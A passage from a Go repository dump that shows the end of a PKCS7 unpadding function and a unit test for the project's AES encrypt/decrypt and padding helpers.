164 | 	if b == nil || len(b) == 0 {
165 | 		return nil, ErrInvalidPKCS7Data
166 | 	}
167 | 	if len(b)%blocksize != 0 {
168 | 		return nil, ErrInvalidPKCS7Padding
169 | 	}
170 | 	c := b[len(b)-1]
171 | 	n := int(c)
172 | 	if n == 0 || n > len(b) {
173 | 		return nil, ErrInvalidPKCS7Padding
174 | 	}
175 | 	for i := 0; i < n; i++ {
176 | 		if b[len(b)-n+i] != c {
177 | 			return nil, ErrInvalidPKCS7Padding
178 | 		}
179 | 	}
180 | 	return b[:len(b)-n], nil
181 | }
182 | 


--------------------------------------------------------------------------------
/test/crypto_test.go:
--------------------------------------------------------------------------------
 1 | package test
 2 | 
 3 | import (
 4 | 	"crypto/aes"
 5 | 	"fmt"
 6 | 	"testing"
 7 | 
 8 | 	"github.com/c-sto/Jaqen/libJaqen/server/util"
 9 | )
10 | 
11 | func TestEncryptDecrypt(t *testing.T) {
12 | 	plaintext := "this some plaintext"
13 | 	key, e := util.GenerateRandomBytes(32)
14 | 	if e != nil {
15 | 		fmt.Println(e)
16 | 		t.Fail()
17 | 	}
18 | 	ct, e := util.EncryptString(plaintext, key)
19 | 	if e != nil {
20 | 		fmt.Println(e)
21 | 		t.Fail()
22 | 	}
23 | 
24 | 	testPad, e := util.Pkcs7Pad([]byte("test"), aes.BlockSize)
25 | 	if e != nil || testPad[len(testPad)-1] != 12 {
26 | 		t.Fail()
27 | 	}
28 | 
29 | 	testDecrypt, e := util.Decrypt(ct, key)
30 | 	if e != nil {
31 | 		fmt.Println(e)
32 | 		t.Fail()
33 | 	}
34 | 	if string(testDecrypt) != plaintext {
35 | 		fmt.Println(string(testDecrypt))
36 | 		t.Fail()
37 | 	}
38 | }
39 | 
40 | //todo: Ensure mac works as expected (modified CT)
41 | //todo: Test bad key
42 | 


--------------------------------------------------------------------------------